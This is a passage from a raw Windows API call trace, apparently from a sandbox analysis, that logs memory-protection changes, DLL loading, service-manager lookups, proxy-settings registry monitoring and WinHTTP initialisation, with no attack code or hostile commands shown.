OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.474] GetCurrentProcess () returned 0xffffffff [0084.474] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510ac, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.474] GetCurrentProcess () returned 0xffffffff [0084.474] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510bc, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.475] GetCurrentProcess () returned 0xffffffff [0084.475] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510bc, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.475] GetCurrentProcess () returned 0xffffffff [0084.475] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510e4, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.475] GetCurrentProcess () returned 0xffffffff [0084.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510e4, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.476] GetCurrentProcess () returned 0xffffffff [0084.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510f8, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.476] GetCurrentProcess () returned 0xffffffff [0084.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510f8, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.476] GetCurrentProcess () returned 0xffffffff [0084.476] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951140, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.477] GetCurrentProcess () returned 0xffffffff [0084.477] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951140, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.477] GetCurrentProcess () returned 0xffffffff [0084.477] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951158, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.477] GetCurrentProcess () returned 0xffffffff [0084.477] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951158, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.477] GetCurrentProcess () returned 0xffffffff [0084.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x7495115c, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.478] GetCurrentProcess () returned 0xffffffff [0084.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x7495115c, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.478] GetCurrentProcess () returned 0xffffffff [0084.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951164, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.478] GetCurrentProcess () returned 0xffffffff [0084.478] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951164, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.479] GetProcAddress (hModule=0x74950000, lpProcName="TraceRegisterExA") returned 0x74952305 [0084.483] GetProcAddress (hModule=0x74950000, lpProcName="TracePrintfExA") returned 0x74951b2d [0084.485] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=36, lpWideCharStr=0x41d9e8, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-winsvc-L1-1-0.dll>") returned 36 [0084.485] SysReAllocStringLen (in: pbstr=0x41e9ec*=0x0, psz="API-MS-WIN-Service-winsvc-L1-1-0.dll", len=0x24 | out: pbstr=0x41e9ec*="API-MS-WIN-Service-winsvc-L1-1-0.dll") returned 1 [0084.485] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-winsvc-L1-1-0.dll", cchLength=0x24 | out: lpsz="api-ms-win-service-winsvc-l1-1-0.dll") returned 0x24 [0084.486] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-winsvc-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0084.514] GetLastError () returned 0x0 [0084.514] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9d8*=0x76d11074, NumberOfBytesToProtect=0x41e9dc, NewAccessProtection=0x4, OldAccessProtection=0x41ea10 | out: BaseAddress=0x41e9d8*=0x76d11000, NumberOfBytesToProtect=0x41e9dc, OldAccessProtection=0x41ea10*=0x20) returned 0x0 [0084.515] GetCurrentProcess () returned 0xffffffff [0084.515] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9d8*=0x76d11074, NumberOfBytesToProtect=0x41e9dc, NewAccessProtection=0x20, OldAccessProtection=0x41ea10 | out: BaseAddress=0x41e9d8*=0x76d11000, NumberOfBytesToProtect=0x41e9dc, OldAccessProtection=0x41ea10*=0x4) returned 0x0 [0084.515] GetCurrentProcess () returned 0xffffffff [0084.515] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9d8*=0x76d11088, NumberOfBytesToProtect=0x41e9dc, NewAccessProtection=0x4, OldAccessProtection=0x41ea10 | out: BaseAddress=0x41e9d8*=0x76d11000, NumberOfBytesToProtect=0x41e9dc, OldAccessProtection=0x41ea10*=0x20) returned 0x0 [0084.515] GetCurrentProcess () returned 0xffffffff [0084.515] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9d8*=0x76d11088, NumberOfBytesToProtect=0x41e9dc, NewAccessProtection=0x20, OldAccessProtection=0x41ea10 | out: BaseAddress=0x41e9d8*=0x76d11000, NumberOfBytesToProtect=0x41e9dc, OldAccessProtection=0x41ea10*=0x4) returned 0x0 [0084.516] GetProcAddress (hModule=0x76d10000, lpProcName="OpenSCManagerA") returned 0x76d164f0 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] ResetEvent (hEvent=0xb8) returned 1 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] ResetEvent (hEvent=0xb8) returned 1 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] GetCurrentThreadId () returned 0xba4 [0084.516] SetEvent (hEvent=0xbc) returned 1 [0084.517] SetEvent (hEvent=0xb8) returned 1 [0084.517] CloseHandle (hObject=0x310) returned 1 [0084.518] GetProcAddress (hModule=0x76d10000, lpProcName="OpenServiceA") returned 0x76d17245 [0084.518] GetProcAddress (hModule=0x76d10000, lpProcName="QueryServiceStatus") returned 0x76d14e4b [0084.519] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=40, lpWideCharStr=0x41d9ec, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-Management-L1-1-0.dll") returned 40 [0084.519] SysReAllocStringLen (in: pbstr=0x41e9f0*=0x0, psz="API-MS-WIN-Service-Management-L1-1-0.dll", len=0x28 | out: pbstr=0x41e9f0*="API-MS-WIN-Service-Management-L1-1-0.dll") returned 1 [0084.519] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-Management-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-service-management-l1-1-0.dll") returned 0x28 [0084.519] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0084.519] GetLastError () returned 0x0 [0084.519] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9dc*=0x76d11074, NumberOfBytesToProtect=0x41e9e0, NewAccessProtection=0x4, OldAccessProtection=0x41ea14 | out: BaseAddress=0x41e9dc*=0x76d11000, NumberOfBytesToProtect=0x41e9e0, OldAccessProtection=0x41ea14*=0x20) returned 0x0 [0084.520] GetCurrentProcess () returned 0xffffffff [0084.520] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9dc*=0x76d11074, NumberOfBytesToProtect=0x41e9e0, NewAccessProtection=0x20, OldAccessProtection=0x41ea14 | out: BaseAddress=0x41e9dc*=0x76d11000, NumberOfBytesToProtect=0x41e9e0, OldAccessProtection=0x41ea14*=0x4) returned 0x0 [0084.520] GetCurrentProcess () returned 0xffffffff [0084.520] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9dc*=0x76d11088, NumberOfBytesToProtect=0x41e9e0, NewAccessProtection=0x4, OldAccessProtection=0x41ea14 | out: BaseAddress=0x41e9dc*=0x76d11000, NumberOfBytesToProtect=0x41e9e0, OldAccessProtection=0x41ea14*=0x20) returned 0x0 [0084.520] GetCurrentProcess () returned 0xffffffff [0084.520] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9dc*=0x76d11088, NumberOfBytesToProtect=0x41e9e0, NewAccessProtection=0x20, OldAccessProtection=0x41ea14 | out: BaseAddress=0x41e9dc*=0x76d11000, NumberOfBytesToProtect=0x41e9e0, OldAccessProtection=0x41ea14*=0x4) returned 0x0 [0084.521] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0084.521] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0084.522] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenCurrentUser") returned 0x777215ad [0084.522] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0084.522] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x41eb94 | out: phkResult=0x41eb94*=0x310) returned 0x0 [0084.523] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyEx") returned 0x0 [0084.524] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0084.524] RegOpenKeyExW (in: hKey=0x310, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x41eb44 | out: phkResult=0x41eb44*=0x314) returned 0x0 [0084.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x318 [0084.525] GetProcAddress (hModule=0x77710000, lpProcName="RegNotifyChangeKeyValue") returned 0x7771e15b [0084.525] RegNotifyChangeKeyValue (hKey=0x314, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x318, fAsynchronous=1) returned 0x0 [0084.525] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyEx") returned 0x0 [0084.526] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0084.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x41eb48 | out: phkResult=0x41eb48*=0x31c) returned 0x0 [0084.526] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320 [0084.526] RegNotifyChangeKeyValue (hKey=0x31c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x320, fAsynchronous=1) returned 0x0 [0084.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x41eb48 | out: phkResult=0x41eb48*=0x324) returned 0x0 [0084.527] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328 [0084.527] RegNotifyChangeKeyValue (hKey=0x324, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x328, fAsynchronous=1) returned 0x0 [0084.527] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41eb3c | out: TokenHandle=0x41eb3c*=0x32c) returned 1 [0084.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x41e448 | out: phkResult=0x41e448*=0x330) returned 0x0 [0084.530] RegQueryValueExW (in: hKey=0x330, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x41e464, lpData=0x0, lpcbData=0x41e460*=0x0 | out: lpType=0x41e464*=0x0, lpData=0x0, lpcbData=0x41e460*=0x0) returned 0x2 [0084.530] RegCloseKey (hKey=0x330) returned 0x0 [0084.531] SysReAllocStringLen (in: pbstr=0x41df4c*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x41df4c*="winhttp.dll") returned 1 [0084.532] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0084.532] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0084.532] GetLastError () returned 0x7e [0084.532] SetLastError (dwErrCode=0x7e) [0084.560] SysReAllocStringLen (in: pbstr=0x41df4c*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x41df4c*="winhttp.dll") returned 1 [0084.560] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0084.561] LoadLibraryExW (lpLibFileName="winhttp.dll", hFile=0x0, dwFlags=0x0) returned 0x74890000 [0085.305] GetLastError () returned 0x0 [0085.305] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891170, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.305] GetCurrentProcess () returned 0xffffffff [0085.305] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891170, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.306] GetCurrentProcess () returned 0xffffffff [0085.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911a4, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.306] GetCurrentProcess () returned 0xffffffff [0085.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911a4, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.306] GetCurrentProcess () returned 0xffffffff [0085.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911dc, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.307] GetCurrentProcess () returned 0xffffffff [0085.307] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911dc, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.307] GetCurrentProcess () returned 0xffffffff [0085.307] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911e4, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.307] GetCurrentProcess () returned 0xffffffff [0085.307] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911e4, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.308] GetCurrentProcess () returned 0xffffffff [0085.308] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911ec, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.308] GetCurrentProcess () returned 0xffffffff [0085.308] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x748911ec, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.308] GetCurrentProcess () returned 0xffffffff [0085.308] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891200, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.309] GetCurrentProcess () returned 0xffffffff [0085.309] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891200, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.309] GetCurrentProcess () returned 0xffffffff [0085.309] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891204, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.310] GetCurrentProcess () returned 0xffffffff [0085.310] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891204, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.310] GetCurrentProcess () returned 0xffffffff [0085.310] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891224, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.310] GetCurrentProcess () returned 0xffffffff [0085.310] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891224, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.310] GetCurrentProcess () returned 0xffffffff [0085.310] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891268, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.311] GetCurrentProcess () returned 0xffffffff [0085.311] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891268, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.311] GetCurrentProcess () returned 0xffffffff [0085.311] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891280, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.311] GetCurrentProcess () returned 0xffffffff [0085.311] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891280, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.312] GetCurrentProcess () returned 0xffffffff [0085.312] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891288, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.312] GetCurrentProcess () returned 0xffffffff [0085.312] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891288, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.312] GetCurrentProcess () returned 0xffffffff [0085.312] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891290, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x4, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x20) returned 0x0 [0085.313] GetCurrentProcess () returned 0xffffffff [0085.313] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41df34*=0x74891290, NumberOfBytesToProtect=0x41df38, NewAccessProtection=0x20, OldAccessProtection=0x41df6c | out: BaseAddress=0x41df34*=0x74891000, NumberOfBytesToProtect=0x41df38, OldAccessProtection=0x41df6c*=0x4) returned 0x0 [0085.314] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpOpen") returned 0x748958b9 [0085.314] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpOpenW") returned 0x0 [0085.315] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpCloseHandle") returned 0x74892c01 [0085.315] GetProcAddress (hModule=0x74890000, lpProcName="WinHttpCloseHandleW") returned 0x0 [0085.315] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x73d048 [0085.317] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=11, lpWideCharStr=0x41d8cc, cchWideChar=2047 | out: lpWideCharStr="SHLWAPI.dll") returned 11 [0085.318] SysReAllocStringLen (in: pbstr=0x41e8d0*=0x0, psz="SHLWAPI.dll", len=0xb | out: pbstr=0x41e8d0*="SHLWAPI.dll") returned 1 [0085.318] CharLowerBuffW (in: lpsz="SHLWAPI.dll", cchLength=0xb | out: lpsz="shlwapi.dll") returned 0xb [0085.318] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0085.318] GetLastError () returned 0x0 [0085.318] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1014, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.319] GetCurrentProcess () returned 0xffffffff [0085.319] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1014, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.319] GetCurrentProcess () returned 0xffffffff [0085.319] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f10b0, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.319] GetCurrentProcess () returned 0xffffffff [0085.319] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f10b0, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.320] GetCurrentProcess () returned 0xffffffff [0085.320] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f10f8, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.320] GetCurrentProcess () returned 0xffffffff [0085.320] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f10f8, 